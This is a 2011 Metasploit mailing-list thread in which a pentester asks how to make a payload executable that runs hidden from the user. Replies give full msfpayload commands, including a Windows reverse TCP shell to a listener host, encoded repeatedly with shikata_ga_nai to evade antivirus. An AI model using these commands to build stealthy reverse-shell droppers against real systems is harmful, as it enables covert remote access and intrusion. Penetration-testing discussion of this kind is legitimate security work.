Re: windows/exec

[alfonso caponi <alfonso.caponi () gmail com>]

No, at least hidden on the screen to the "normal user" :)

I'm not writing a malware, but I'm making a pentest. In my scenario I would
use a single binary and does not edit the registry etc.

2011/3/9 Canberk BOLAT <canberk.bolat () gmail com>

> Do you want to make it something like hidden process if i am not
> understand wrong? :)
>
> 2011/3/9 alfonso caponi <alfonso.caponi () gmail com>:
> > Yes.... I know... but how can I run a Win32 command shell in background?
> :)
> > My payload (created with msfpayload) works fine in "foreground".
> >
> > 2011/3/9 Nicolas Krassas <krasn () deventum com>
> > > Google is nice many times and the results are faster than the list, it
> > > will be nice for you to take a look at
> http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
> > > On Wed, Mar 9, 2011 at 8:04 PM, alfonso caponi <
> alfonso.caponi () gmail com>
> > > wrote:
> > > > mmmm no, in my scenario I need use a exe file.
> > > > Would be useful windows/download_exec... :(
> > > >
> > > > 2011/3/9 Ahmed Shawky <ahmed () isecur1ty org>
> > > > > ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.8 LPORT=443 R |
> > > > > msfencode -t exe -e x86/shikata_ga_nai -c 10 -o out.exe
> > > > >
> > > > > On Wed, Mar 9, 2011 at 6:45 PM, alfonso caponi
> > > > > <alfonso.caponi () gmail com> wrote:
> > > > > > Hi list,
> > > > > >
> > > > > > according to you, using msfpayload (windows/exec), how can I create
> an
> > > > > > executable file to run a dos shell command in background?
> > > > > >
> > > > > > For example a first step:
> > > > > >
> > > > > > ./msfpayload windows/exec CMD="ping -n 5 1.1.1.1" R | ./msfencode -e
> > > > > > x86/shikata_ga_nai -c 10 -t exe -o test.exe
> > > > > >
> > > > > > Thank you very much,
> > > > > > AL
> > > > > >
> > > > > > *ps: windows/download_exec not works on my XP sp3. no connections
> > > > > > created and the process remains active. (#3771?)
> > > > > > _______________________________________________
> > > > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > > >
> > > > >
> > > > >
> > > > > --
> > > > >
> > > > > Ahmed Shawky El-Antry
> > > > > Pen-tester, Programmer and System administrator
> > > > > lnxg33k owner "http://lnxg33k.wordpress.com";
> > > > > Isecur1ty team member"http://www.isecur1ty.org";
> > > > > Twitter @lnxg33k
> > > >
> > > >
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> >
> >
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> --
> Canberk Bolat
> Security Researcher
> http://twitter.com/cnbrkbolat
> http://cbolat.blogspot.com
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework